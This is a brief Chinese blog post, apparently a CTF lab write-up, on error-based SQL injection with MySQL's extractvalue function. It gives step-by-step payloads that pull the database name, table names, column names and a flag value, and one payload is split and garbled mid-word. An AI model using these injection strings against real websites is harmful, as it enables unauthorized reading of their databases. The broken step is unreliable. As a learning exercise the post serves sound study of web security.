（SQL初实践2）SQL报错注入_java

使用Extractvalue函数进行报错注入：

首先，Extractvalue函数对于“~”不能识别，“~”的ASCII码对应的是0x7e。

1.查询数据库名称 id=1 and extractv

1 and extractvalue(1,concat(0x7e,(select database())))

alue("anything",concat(0x7e,(select database())))#

得到数据库名称：sqli

2.查询表名

1 union select 1,extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="sqli")))

3.查询字段名

id=1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="flag")))

4.flag

id=1 and extractvalue(1,concat(0x7e,(select flag from sqli.flag)))

补上}就搞定=）

ctfhub{d0725f6223ab8d3048eeeb81}

欢迎分享，转载请注明来源：内存溢出

（SQL初实践2）SQL报错注入